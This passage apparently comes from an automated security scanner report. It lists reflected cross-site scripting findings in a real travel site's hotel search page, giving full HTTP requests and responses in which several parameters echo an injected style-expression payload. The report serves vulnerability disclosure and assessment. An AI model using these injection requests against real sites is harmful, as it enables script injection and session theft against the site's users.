Host: travela.priceline.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
Origin: http://www.priceline.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.priceline.com/QP.asp?ProductID=5R&refid=PLIGOUGO&refclickid=HOTELSEARCH&City=Boston,United%20States&Rooms=1&CheckInDate=10/04/11&CheckOutDate=10/07/11
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Stick2=ID=0%7CA%7C10%2F2%2F2011+20%3A9; Referral=SOURCEID=PL&PRODUCTID=&WEBENTRYTIME=10%2F2%2F2011+20%3A9%3A9&ID=IGOUGO&CLICKID=HOTELSEARCH; vsch=v2011100300090989417126%5F98264026; PSessKey=711510AC721510AC20111003000909914181269334; vid=v2011100300090989417126; SITESERVER=ID=d029e777cf494e903eef89a4c018b0f4; WT_FPC=id=2681d53fc9a0a3b6dd31317600550352:lv=1317600550352:ss=1317600550352; __utma=137358961.1769259490.1317600551.1317600551.1317600551.1; __utmb=137358961.1.10.1317600551; __utmc=137358961; __utmz=137358961.1317600551.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:12:29 GMT
Server: Apache
Set-Cookie: PSessKey=; Domain=.priceline.com; Path=/
Set-Cookie: JSessionKey=; Domain=.priceline.com; Path=/
Set-Cookie: JSessionKey=5463010a5564010a201110030012298d9011569040; Domain=.priceline.com; Path=/
Set-Cookie: Referral=CLICKID=HOTELSEARCH&WEBENTRYTIME=10%2F02%2F2011+20%3A12%3A29&ID=IGOUGO&SOURCEID=PL&PRODUCTID=; Domain=.priceline.com; Expires=Wed, 02-Nov-2011 00:12:29 GMT; Path=/
Set-Cookie: JSESSIONID=6EEC0222C16184AE104462D4B0709E7B; Path=/hotel
Vary: Accept-Encoding
Content-Length: 8919
Content-Type: text/html;charset=ISO-8859-1

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<!--Start of taglibs.jsp page-->


<!--End of taglibs.jsp page-->


...[SNIP]...
<input type="hidden" name="plf" value="pcln64d85"style="x:expression(alert(1))"a198d7f06731f0eda"/>
...[SNIP]...
4.136. http://travela.priceline.com/hotel/searchHotels.do [refclickid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://travela.priceline.com
Path:   /hotel/searchHotels.do

Issue detail

The value of the refclickid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a2b1f"style%3d"x%3aexpression(alert(1))"cba8bf32e4d was submitted in the refclickid parameter. This input was echoed as a2b1f"style="x:expression(alert(1))"cba8bf32e4d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /hotel/searchHotels.do?session_key=711510AC721510AC2011100300374475eeb1270807&plf=pclh&INIT_SESSION=true&refid=PLAWAYNETWORK&refclickid=TRIP_HOTELSEARCHa2b1f"style%3d"x%3aexpression(alert(1))"cba8bf32e4d&searchType=CITY&cityName=bos&numberOfRooms=1&hotelBrand=&searchHotelName=&starRating=-1&checkInDate=10%2F09%2F2011&checkOutDate=10%2F16%2F2011&KMode=Y&selectedTab=0&passingValues=YES&affiliateSubID=514A HTTP/1.1
Host: travela.priceline.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.priceline.com/qp.asp?productid=5&city=bos&rooms=1&checkindate=10/09/2011&checkoutdate=10/16/2011&refid=PLAWAYNETWORK&refclickid=TRIP_HOTELSEARCH
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SITESERVER=ID=d029e777cf494e903eef89a4c018b0f4; SETI=CCD82172E0702BC07F6EEEC20A4BA00AC57A5F491C628C0467A073D149FA2A3BB6E6E8BBB79E476AEE07A579D4DB94147A61E206E535A32806BAB0F253612BA6DBDA270CF1B13D3FC57A5F491C628C04AC84BA6362ADBF59CACA2EC5D22C91F0A30B769ACEDACD603314752CB71B92D3; vid=v2011100300373188ec0127; vsch=v2011100300373188ec0127%5F13692735; Referral=CLICKID=TRIP%5FHOTELSEARCH&SOURCEID=PL&PRODUCTID=&WEBENTRYTIME=10%2F2%2F2011+20%3A37%3A31&ID=AWAYNETWORK; Stick2=ID=0%7CA%7C10%2F2%2F2011+20%3A37; WT_FPC=id=2681d53fc9a0a3b6dd31317600550352:lv=1317602255259:ss=1317600550352; __utma=137358961.1769259490.1317600551.1317600551.1317600551.1; __utmb=137358961.3.10.1317600551; __utmc=137358961; __utmz=137358961.1317600551.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf; PSessKey=711510AC721510AC2011100300374475eeb1270807

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:42:14 GMT
Server: Apache
Set-Cookie: PSessKey=; Domain=.priceline.com; Path=/
Set-Cookie: JSessionKey=; Domain=.priceline.com; Path=/
Set-Cookie: JSessionKey=5064010a4663010a20111003004214fcb011591999; Domain=.priceline.com; Path=/
Set-Cookie: Referral=CLICKID=TRIP_HOTELSEARCHa2b1f%22style%3D%22x%3Aexpression%28alert%281%29%29%22cba8bf32e4d&WEBENTRYTIME=10%2F02%2F2011+20%3A42%3A14&ID=AWAYNETWORK&SOURCEID=PL&PRODUCTID=; Domain=.priceline.com; Expires=Wed, 02-Nov-2011 00:42:14 GMT; Path=/
Set-Cookie: JSESSIONID=478ECA18FDCB0CBE1B6CF2F5DD8CAE2E; Path=/hotel
Vary: Accept-Encoding
Content-Length: 8692
Content-Type: text/html;charset=ISO-8859-1

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<!--Start of taglibs.jsp page-->


<!--End of taglibs.jsp page-->


...[SNIP]...
<input type="hidden" name="refclickid" value="TRIP_HOTELSEARCHa2b1f"style="x:expression(alert(1))"cba8bf32e4d"/>
...[SNIP]...
4.137. http://travela.priceline.com/hotel/searchHotels.do [refid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://travela.priceline.com
Path:   /hotel/searchHotels.do

Issue detail

The value of the refid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f1a46"style%3d"x%3aexpression(alert(1))"ca3302ebf48 was submitted in the refid parameter. This input was echoed as f1a46"style="x:expression(alert(1))"ca3302ebf48 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /hotel/searchHotels.do?session_key=711510AC721510AC2011100300374475eeb1270807&plf=pclh&INIT_SESSION=true&refid=PLAWAYNETWORKf1a46"style%3d"x%3aexpression(alert(1))"ca3302ebf48&refclickid=TRIP_HOTELSEARCH&searchType=CITY&cityName=bos&numberOfRooms=1&hotelBrand=&searchHotelName=&starRating=-1&checkInDate=10%2F09%2F2011&checkOutDate=10%2F16%2F2011&KMode=Y&selectedTab=0&passingValues=YES&affiliateSubID=514A HTTP/1.1
Host: travela.priceline.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.priceline.com/qp.asp?productid=5&city=bos&rooms=1&checkindate=10/09/2011&checkoutdate=10/16/2011&refid=PLAWAYNETWORK&refclickid=TRIP_HOTELSEARCH
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SITESERVER=ID=d029e777cf494e903eef89a4c018b0f4; SETI=CCD82172E0702BC07F6EEEC20A4BA00AC57A5F491C628C0467A073D149FA2A3BB6E6E8BBB79E476AEE07A579D4DB94147A61E206E535A32806BAB0F253612BA6DBDA270CF1B13D3FC57A5F491C628C04AC84BA6362ADBF59CACA2EC5D22C91F0A30B769ACEDACD603314752CB71B92D3; vid=v2011100300373188ec0127; vsch=v2011100300373188ec0127%5F13692735; Referral=CLICKID=TRIP%5FHOTELSEARCH&SOURCEID=PL&PRODUCTID=&WEBENTRYTIME=10%2F2%2F2011+20%3A37%3A31&ID=AWAYNETWORK; Stick2=ID=0%7CA%7C10%2F2%2F2011+20%3A37; WT_FPC=id=2681d53fc9a0a3b6dd31317600550352:lv=1317602255259:ss=1317600550352; __utma=137358961.1769259490.1317600551.1317600551.1317600551.1; __utmb=137358961.3.10.1317600551; __utmc=137358961; __utmz=137358961.1317600551.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf; PSessKey=711510AC721510AC2011100300374475eeb1270807

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:42:02 GMT
Server: Apache
Set-Cookie: PSessKey=; Domain=.priceline.com; Path=/
Set-Cookie: JSessionKey=; Domain=.priceline.com; Path=/
Set-Cookie: JSessionKey=5564010a5064010a20111003004202fc4011595135; Domain=.priceline.com; Path=/
Set-Cookie: Referral=CLICKID=TRIP_HOTELSEARCH&WEBENTRYTIME=10%2F02%2F2011+20%3A42%3A02&ID=AWAYNETWORKf1a46%22style%3D%22x%3Aexpression%28alert%281%29%29%22ca3302ebf48&PRODUCTID=&SOURCEID=PL; Domain=.priceline.com; Expires=Wed, 02-Nov-2011 00:42:02 GMT; Path=/
Set-Cookie: JSESSIONID=83C2A1DBF448DE9177F5CE64AE431F48; Path=/hotel
Vary: Accept-Encoding
Content-Length: 8673
Content-Type: text/html;charset=ISO-8859-1

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<!--Start of taglibs.jsp page-->


<!--End of taglibs.jsp page-->


...[SNIP]...
<input type="hidden" name="refid" value="PLAWAYNETWORKf1a46"style="x:expression(alert(1))"ca3302ebf48"/>
...[SNIP]...
4.138. http://travela.priceline.com/hotel/searchHotels.do [searchHotelName parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://travela.priceline.com
Path:   /hotel/searchHotels.do

Issue detail

The value of the searchHotelName request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3c224"style%3d"x%3aexpression(alert(1))"ac9aefefd97 was submitted in the searchHotelName parameter. This input was echoed as 3c224"style="x:expression(alert(1))"ac9aefefd97 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /hotel/searchHotels.do?session_key=711510AC721510AC2011100300374475eeb1270807&plf=pclh&INIT_SESSION=true&refid=PLAWAYNETWORK&refclickid=TRIP_HOTELSEARCH&searchType=CITY&cityName=bos&numberOfRooms=1&hotelBrand=&searchHotelName=3c224"style%3d"x%3aexpression(alert(1))"ac9aefefd97&starRating=-1&checkInDate=10%2F09%2F2011&checkOutDate=10%2F16%2F2011&KMode=Y&selectedTab=0&passingValues=YES&affiliateSubID=514A HTTP/1.1
Host: travela.priceline.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.priceline.com/qp.asp?productid=5&city=bos&rooms=1&checkindate=10/09/2011&checkoutdate=10/16/2011&refid=PLAWAYNETWORK&refclickid=TRIP_HOTELSEARCH
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SITESERVER=ID=d029e777cf494e903eef89a4c018b0f4; SETI=CCD82172E0702BC07F6EEEC20A4BA00AC57A5F491C628C0467A073D149FA2A3BB6E6E8BBB79E476AEE07A579D4DB94147A61E206E535A32806BAB0F253612BA6DBDA270CF1B13D3FC57A5F491C628C04AC84BA6362ADBF59CACA2EC5D22C91F0A30B769ACEDACD603314752CB71B92D3; vid=v2011100300373188ec0127; vsch=v2011100300373188ec0127%5F13692735; Referral=CLICKID=TRIP%5FHOTELSEARCH&SOURCEID=PL&PRODUCTID=&WEBENTRYTIME=10%2F2%2F2011+20%3A37%3A31&ID=AWAYNETWORK; Stick2=ID=0%7CA%7C10%2F2%2F2011+20%3A37; WT_FPC=id=2681d53fc9a0a3b6dd31317600550352:lv=1317602255259:ss=1317600550352; __utma=137358961.1769259490.1317600551.1317600551.1317600551.1; __utmb=137358961.3.10.1317600551; __utmc=137358961; __utmz=137358961.1317600551.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf; PSessKey=711510AC721510AC2011100300374475eeb1270807

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:43:24 GMT
Server: Apache
Set-Cookie: PSessKey=; Domain=.priceline.com; Path=/
Set-Cookie: JSessionKey=; Domain=.priceline.com; Path=/
Set-Cookie: JSessionKey=5064010a5564010a20111003004324892011586846; Domain=.priceline.com; Path=/
Set-Cookie: Referral=CLICKID=TRIP_HOTELSEARCH&WEBENTRYTIME=10%2F02%2F2011+20%3A43%3A24&ID=AWAYNETWORK&SOURCEID=PL&PRODUCTID=; Domain=.priceline.com; Expires=Wed, 02-Nov-2011 00:43:24 GMT; Path=/
Set-Cookie: JSESSIONID=98CB30E792005DF2ECE69F8BDE3B019C; Path=/hotel
Vary: Accept-Encoding
Content-Length: 8701
Content-Type: text/html;charset=ISO-8859-1

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<!--Start of taglibs.jsp page-->


<!--End of taglibs.jsp page-->


...[SNIP]...
<input type="hidden" name="searchHotelName" value="3c224"style="x:expression(alert(1))"ac9aefefd97"/>
...[SNIP]...
4.139. http://travela.priceline.com/hotel/searchHotels.do [searchHotelName parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://travela.priceline.com
Path:   /hotel/searchHotels.do

Issue detail

The value of the searchHotelName request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 180f2"style%3d"x%3aexpression(alert(1))"e75efbd596f11fed2 was submitted in the searchHotelName parameter. This input was echoed as 180f2"style="x:expression(alert(1))"e75efbd596f11fed2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /hotel/searchHotels.do?session_key=711510AC721510AC20111003000909914181269334&plf=pcln&INIT_SESSION=true&RefID=PLIGOUGO&RefClickID=HOTELSEARCH&checkInDate=10%2F04%2F11&CkInMonth=10&CkInDay=04&CkInYear=2011&checkOutDate=10%2F07%2F11&CkOutMonth=10&CkOutDay=07&CkOutYear=2011&homepage=Y&Initialized=Y&cityName=Boston%2CUnited+States&otherCityName=Boston%2CUnited+States&starRating=-1&numberOfRooms=1&searchHotelName=180f2"style%3d"x%3aexpression(alert(1))"e75efbd596f11fed2&hotelBrand= HTTP/1.1
Host: travela.priceline.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
Origin: http://www.priceline.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.priceline.com/QP.asp?ProductID=5R&refid=PLIGOUGO&refclickid=HOTELSEARCH&City=Boston,United%20States&Rooms=1&CheckInDate=10/04/11&CheckOutDate=10/07/11
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Stick2=ID=0%7CA%7C10%2F2%2F2011+20%3A9; Referral=SOURCEID=PL&PRODUCTID=&WEBENTRYTIME=10%2F2%2F2011+20%3A9%3A9&ID=IGOUGO&CLICKID=HOTELSEARCH; vsch=v2011100300090989417126%5F98264026; PSessKey=711510AC721510AC20111003000909914181269334; vid=v2011100300090989417126; SITESERVER=ID=d029e777cf494e903eef89a4c018b0f4; WT_FPC=id=2681d53fc9a0a3b6dd31317600550352:lv=1317600550352:ss=1317600550352; __utma=137358961.1769259490.1317600551.1317600551.1317600551.1; __utmb=137358961.1.10.1317600551; __utmc=137358961; __utmz=137358961.1317600551.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:18:52 GMT
Server: Apache
Set-Cookie: PSessKey=; Domain=.priceline.com; Path=/
Set-Cookie: JSessionKey=; Domain=.priceline.com; Path=/
Set-Cookie: JSessionKey=5064010a5564010a20111003001852c4b011716787; Domain=.priceline.com; Path=/
Set-Cookie: Referral=CLICKID=HOTELSEARCH&WEBENTRYTIME=10%2F02%2F2011+20%3A18%3A52&ID=IGOUGO&PRODUCTID=&SOURCEID=PL; Domain=.priceline.com; Expires=Wed, 02-Nov-2011 00:18:52 GMT; Path=/
Set-Cookie: JSESSIONID=E910CBEB7C4B0BA6F229F909870A077C; Path=/hotel
Vary: Accept-Encoding
Content-Length: 8955
Content-Type: text/html;charset=ISO-8859-1

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<!--Start of taglibs.jsp page-->


<!--End of taglibs.jsp page-->


...[SNIP]...
<input type="hidden" name="searchHotelName" value="180f2"style="x:expression(alert(1))"e75efbd596f11fed2"/>
...[SNIP]...
4.140. http://travela.priceline.com/hotel/searchHotels.do [searchType parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://travela.priceline.com
Path:   /hotel/searchHotels.do

Issue detail

The value of the searchType request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload afb1a"style%3d"x%3aexpression(alert(1))"eb0c43cef34 was submitted in the searchType parameter. This input was echoed as afb1a"style="x:expression(alert(1))"eb0c43cef34 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /hotel/searchHotels.do?session_key=711510AC721510AC2011100300374475eeb1270807&plf=pclh&INIT_SESSION=true&refid=PLAWAYNETWORK&refclickid=TRIP_HOTELSEARCH&searchType=CITYafb1a"style%3d"x%3aexpression(alert(1))"eb0c43cef34&cityName=bos&numberOfRooms=1&hotelBrand=&searchHotelName=&starRating=-1&checkInDate=10%2F09%2F2011&checkOutDate=10%2F16%2F2011&KMode=Y&selectedTab=0&passingValues=YES&affiliateSubID=514A HTTP/1.1
Host: travela.priceline.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.priceline.com/qp.asp?productid=5&city=bos&rooms=1&checkindate=10/09/2011&checkoutdate=10/16/2011&refid=PLAWAYNETWORK&refclickid=TRIP_HOTELSEARCH
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SITESERVER=ID=d029e777cf494e903eef89a4c018b0f4; SETI=CCD82172E0702BC07F6EEEC20A4BA00AC57A5F491C628C0467A073D149FA2A3BB6E6E8BBB79E476AEE07A579D4DB94147A61E206E535A32806BAB0F253612BA6DBDA270CF1B13D3FC57A5F491C628C04AC84BA6362ADBF59CACA2EC5D22C91F0A30B769ACEDACD603314752CB71B92D3; vid=v2011100300373188ec0127; vsch=v2011100300373188ec0127%5F13692735; Referral=CLICKID=TRIP%5FHOTELSEARCH&SOURCEID=PL&PRODUCTID=&WEBENTRYTIME=10%2F2%2F2011+20%3A37%3A31&ID=AWAYNETWORK; Stick2=ID=0%7CA%7C10%2F2%2F2011+20%3A37; WT_FPC=id=2681d53fc9a0a3b6dd31317600550352:lv=1317602255259:ss=1317600550352; __utma=137358961.1769259490.1317600551.1317600551.1317600551.1; __utmb=137358961.3.10.1317600551; __utmc=137358961; __utmz=137358961.1317600551.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf; PSessKey=711510AC721510AC2011100300374475eeb1270807

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:42:27 GMT
Server: Apache
Set-Cookie: PSessKey=; Domain=.priceline.com; Path=/
Set-Cookie: JSessionKey=; Domain=.priceline.com; Path=/
Set-Cookie: JSessionKey=5463010a5064010a2011100300422785f011588222; Domain=.priceline.com; Path=/
Set-Cookie: Referral=CLICKID=TRIP_HOTELSEARCH&WEBENTRYTIME=10%2F02%2F2011+20%3A42%3A27&ID=AWAYNETWORK&PRODUCTID=&SOURCEID=PL; Domain=.priceline.com; Expires=Wed, 02-Nov-2011 00:42:27 GMT; Path=/
Set-Cookie: JSESSIONID=5AF6412533AE00D3D1CEEF9F638769E6; Path=/hotel
Vary: Accept-Encoding
Content-Length: 8692
Content-Type: text/html;charset=ISO-8859-1

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<!--Start of taglibs.jsp page-->


<!--End of taglibs.jsp page-->


...[SNIP]...
<input type="hidden" name="searchType" value="CITYafb1a"style="x:expression(alert(1))"eb0c43cef34"/>
...[SNIP]...
4.141. http://travela.priceline.com/hotel/searchHotels.do [session_key parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://travela.priceline.com
Path:   /hotel/searchHotels.do

Issue detail

The value of the session_key request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5152c"style%3d"x%3aexpression(alert(1))"1c7c7696765 was submitted in the session_key parameter. This input was echoed as 5152c"style="x:expression(alert(1))"1c7c7696765 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /hotel/searchHotels.do?session_key=711510AC721510AC2011100300374475eeb12708075152c"style%3d"x%3aexpression(alert(1))"1c7c7696765&plf=pclh&INIT_SESSION=true&refid=PLAWAYNETWORK&refclickid=TRIP_HOTELSEARCH&searchType=CITY&cityName=bos&numberOfRooms=1&hotelBrand=&searchHotelName=&starRating=-1&checkInDate=10%2F09%2F2011&checkOutDate=10%2F16%2F2011&KMode=Y&selectedTab=0&passingValues=YES&affiliateSubID=514A HTTP/1.1
Host: travela.priceline.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.priceline.com/qp.asp?productid=5&city=bos&rooms=1&checkindate=10/09/2011&checkoutdate=10/16/2011&refid=PLAWAYNETWORK&refclickid=TRIP_HOTELSEARCH
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SITESERVER=ID=d029e777cf494e903eef89a4c018b0f4; SETI=CCD82172E0702BC07F6EEEC20A4BA00AC57A5F491C628C0467A073D149FA2A3BB6E6E8BBB79E476AEE07A579D4DB94147A61E206E535A32806BAB0F253612BA6DBDA270CF1B13D3FC57A5F491C628C04AC84BA6362ADBF59CACA2EC5D22C91F0A30B769ACEDACD603314752CB71B92D3; vid=v2011100300373188ec0127; vsch=v2011100300373188ec0127%5F13692735; Referral=CLICKID=TRIP%5FHOTELSEARCH&SOURCEID=PL&PRODUCTID=&WEBENTRYTIME=10%2F2%2F2011+20%3A37%3A31&ID=AWAYNETWORK; Stick2=ID=0%7CA%7C10%2F2%2F2011+20%3A37; WT_FPC=id=2681d53fc9a0a3b6dd31317600550352:lv=1317602255259:ss=1317600550352; __utma=137358961.1769259490.1317600551.1317600551.1317600551.1; __utmb=137358961.3.10.1317600551; __utmc=137358961; __utmz=137358961.1317600551.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf; PSessKey=711510AC721510AC2011100300374475eeb1270807

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:41:43 GMT
Server: Apache
Set-Cookie: PSessKey=; Domain=.priceline.com; Path=/
Set-Cookie: JSessionKey=; Domain=.priceline.com; Path=/
Set-Cookie: JSessionKey=5463010a5064010a20111003004143fb1011593135; Domain=.priceline.com; Path=/
Set-Cookie: Referral=CLICKID=TRIP_HOTELSEARCH&WEBENTRYTIME=10%2F02%2F2011+20%3A41%3A43&ID=AWAYNETWORK&PRODUCTID=&SOURCEID=PL; Domain=.priceline.com; Expires=Wed, 02-Nov-2011 00:41:43 GMT; Path=/
Set-Cookie: JSESSIONID=2FC916A2D6AEAFE7CD85D65B780218F1; Path=/hotel
Vary: Accept-Encoding
Content-Length: 8701
Content-Type: text/html;charset=ISO-8859-1

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<!--Start of taglibs.jsp page-->


<!--End of taglibs.jsp page-->


...[SNIP]...
<input type="hidden" name="session_key" value="711510AC721510AC2011100300374475eeb12708075152c"style="x:expression(alert(1))"1c7c7696765"/>
...[SNIP]...
4.142. http://travela.priceline.com/hotel/searchHotels.do [session_key parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://travela.priceline.com
Path:   /hotel/searchHotels.do

Issue detail

The value of the session_key request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ad165"style%3d"x%3aexpression(alert(1))"b5f07388fd31c4bf1 was submitted in the session_key parameter. This input was echoed as ad165"style="x:expression(alert(1))"b5f07388fd31c4bf1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /hotel/searchHotels.do?session_key=711510AC721510AC20111003000909914181269334ad165"style%3d"x%3aexpression(alert(1))"b5f07388fd31c4bf1&plf=pcln&INIT_SESSION=true&RefID=PLIGOUGO&RefClickID=HOTELSEARCH&checkInDate=10%2F04%2F11&CkInMonth=10&CkInDay=04&CkInYear=2011&checkOutDate=10%2F07%2F11&CkOutMonth=10&CkOutDay=07&CkOutYear=2011&homepage=Y&Initialized=Y&cityName=Boston%2CUnited+States&otherCityName=Boston%2CUnited+States&starRating=-1&numberOfRooms=1&searchHotelName=&hotelBrand= HTTP/1.1
Host: travela.priceline.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
Origin: http://www.priceline.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.priceline.com/QP.asp?ProductID=5R&refid=PLIGOUGO&refclickid=HOTELSEARCH&City=Boston,United%20States&Rooms=1&CheckInDate=10/04/11&CheckOutDate=10/07/11
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
